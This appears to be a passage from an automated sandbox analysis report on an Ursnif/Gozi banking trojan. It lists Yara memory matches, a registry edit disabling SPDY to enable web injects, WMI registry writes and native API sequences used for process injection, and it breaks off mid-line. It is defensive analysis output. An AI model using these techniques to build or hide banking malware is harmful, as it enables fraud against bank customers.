          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

          E-Banking Fraud:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY
          Disables SPDY (HTTP compression, likely to perform web injects)Show sources
          Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Writes or reads registry keys via WMIShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Writes registry values via WMIShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F4F73 GetProcAddress,NtCreateSection,memset,2_2_033F4F73
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_033F11A9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F34D0 NtMapViewOfSection,2_2_033F34D0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FB159 NtQueryVirtualMemory,2_2_033FB159
          Source: C:\Windows\explorer.exeCode function: 32_2_04DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,32_2_04DAC458
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA1C74 NtQuerySystemInformation,32_2_04DA1C74
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC9584 NtReadVirtualMemory,32_2_04DC9584
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA7D44 NtQueryInformationProcess,32_2_04DA7D44
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC1EEC NtCreateSection,32_2_04DC1EEC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,32_2_04DAF640
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBEF14 NtMapViewOfSection,32_2_04DBEF14
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCF9A4 NtAllocateVirtualMemory,32_2_04DCF9A4
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCC130 NtWriteVirtualMemory,32_2_04DCC130
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB1A9C RtlAllocateHeap,NtQueryInformationProcess,32_2_04DB1A9C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,32_2_04DB2BD8
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC9B4C NtQueryInformationProcess,32_2_04DC9B4C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,32_2_04DE1002
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCF9A4 NtAllocateVirtualMemory,33_2_00DCF9A4
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCC130 NtWriteVirtualMemory,33_2_00DCC130
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB1A9C NtQueryInformationProcess,33_2_00DB1A9C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,33_2_00DB2BD8
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC9B4C NtQueryInformationProcess,33_2_00DC9B4C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,33_2_00DAC458
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC9584 NtReadVirtualMemory,33_2_00DC9584
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC1EEC NtCreateSection,33_2_00DC1EEC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,33_2_00DAF640
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DBEF14 NtMapViewOfSection,33_2_00DBEF14
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,33_2_00DE1002
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4359B4C NtQueryInformationProcess,35_2_000001E7A4359B4C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433F640 NtQueryInformationToken,NtQueryInformationToken,NtClose,35_2_000001E7A433F640
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4371002 NtProtectVirtualMemory,NtProtectVirtualMemory,35_2_000001E7A4371002
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033FAF342_2_033FAF34
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F28E92_2_033F28E9
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA74A832_2_04DA74A8
          Source: C:\Windows\explorer.exeCode function: 32_2_04DAC45832_2_04DAC458
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC9C0432_2_04DC9C04
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB343832_2_04DB3438
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB750032_2_04DB7500
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA3F9832_2_04DA3F98
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB589032_2_04DB5890
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB285432_2_04DB2854
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA42CC32_2_04DA42CC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBAACC32_2_04DBAACC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DAEBD032_2_04DAEBD0
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB6B8032_2_04DB6B80
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB44FC32_2_04DB44FC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DADC8832_2_04DADC88
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC1C6832_2_04DC1C68
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCD46832_2_04DCD468
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC7DDC32_2_04DC7DDC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA559C32_2_04DA559C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC75B432_2_04DC75B4
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC15A032_2_04DC15A0
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC0D4032_2_04DC0D40
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCED7C32_2_04DCED7C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA951432_2_04DA9514
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB1D1432_2_04DB1D14
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA1D2032_2_04DA1D20
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBBE9C32_2_04DBBE9C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCEFD032_2_04DCEFD0
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB97C832_2_04DB97C8
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB4F5C32_2_04DB4F5C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBEF7C32_2_04DBEF7C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB2F1C32_2_04DB2F1C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA78F032_2_04DA78F0
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCE09C32_2_04DCE09C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB386C32_2_04DB386C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB206C32_2_04DB206C
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBE80832_2_04DBE808
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCE03832_2_04DCE038
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB11DC32_2_04DB11DC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA49BC32_2_04DA49BC
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC029432_2_04DC0294
          Source: C:\Windows\explorer.exeCode function: 32_2_04DCFA1032_2_04DCFA10
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC6A2832_2_04DC6A28
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC2BD832_2_04DC2BD8
          Source: C:\Windows\explorer.exeCode function: 32_2_04DC53D432_2_04DC53D4
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB3BF432_2_04DB3BF4
          Source: C:\Windows\explorer.exeCode function: 32_2_04DA2B4032_2_04DA2B40
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB030432_2_04DB0304
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB589033_2_00DB5890
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB6B8033_2_00DB6B80
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DAC45833_2_00DAC458
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA78F033_2_00DA78F0
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCE09C33_2_00DCE09C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB285433_2_00DB2854
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB386C33_2_00DB386C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB206C33_2_00DB206C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DBE80833_2_00DBE808
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCE03833_2_00DCE038
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB11DC33_2_00DB11DC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA49BC33_2_00DA49BC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA42CC33_2_00DA42CC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DBAACC33_2_00DBAACC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC029433_2_00DC0294
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCFA1033_2_00DCFA10
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC6A2833_2_00DC6A28
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC2BD833_2_00DC2BD8
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC53D433_2_00DC53D4
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DAEBD033_2_00DAEBD0
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB3BF433_2_00DB3BF4
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA2B4033_2_00DA2B40
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB030433_2_00DB0304
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB44FC33_2_00DB44FC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DADC8833_2_00DADC88
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA74A833_2_00DA74A8
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC1C6833_2_00DC1C68
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCD46833_2_00DCD468
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC9C0433_2_00DC9C04
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB343833_2_00DB3438
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC7DDC33_2_00DC7DDC
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA559C33_2_00DA559C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC75B433_2_00DC75B4
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC15A033_2_00DC15A0
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DC0D4033_2_00DC0D40
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCED7C33_2_00DCED7C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA951433_2_00DA9514
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB1D1433_2_00DB1D14
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB750033_2_00DB7500
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA1D2033_2_00DA1D20
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DBBE9C33_2_00DBBE9C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DCEFD033_2_00DCEFD0
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB97C833_2_00DB97C8
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DA3F9833_2_00DA3F98
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB4F5C33_2_00DB4F5C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DBEF7C33_2_00DBEF7C
          Source: C:\Windows\System32\control.exeCode function: 33_2_00DB2F1C33_2_00DB2F1C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4346B8035_2_000001E7A4346B80
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434589035_2_000001E7A4345890
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43349BC35_2_000001E7A43349BC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43411DC35_2_000001E7A43411DC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4356A2835_2_000001E7A4356A28
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435FA1035_2_000001E7A435FA10
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435029435_2_000001E7A4350294
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434030435_2_000001E7A4340304
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434AACC35_2_000001E7A434AACC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43342CC35_2_000001E7A43342CC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4332B4035_2_000001E7A4332B40
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4359C0435_2_000001E7A4359C04
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4343BF435_2_000001E7A4343BF4
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4352BD835_2_000001E7A4352BD8
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43553D435_2_000001E7A43553D4
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433EBD035_2_000001E7A433EBD0
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434343835_2_000001E7A4343438
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4351C6835_2_000001E7A4351C68
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435D46835_2_000001E7A435D468
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433C45835_2_000001E7A433C458
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43374A835_2_000001E7A43374A8
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433DC8835_2_000001E7A433DC88
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43444FC35_2_000001E7A43444FC
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A434750035_2_000001E7A4347500
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4350D4035_2_000001E7A4350D40
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4331D2035_2_000001E7A4331D20
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4341D1435_2_000001E7A4341D14
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433951435_2_000001E7A4339514
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A435ED7C35_2_000001E7A435ED7C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43575B435_2_000001E7A43575B4
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A433559C35_2_000001E7A433559C
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A43515A035_2_000001E7A43515A0
          Source: C:\Windows\System32\rundll32.exeCode function: 35_2_000001E7A4357DDC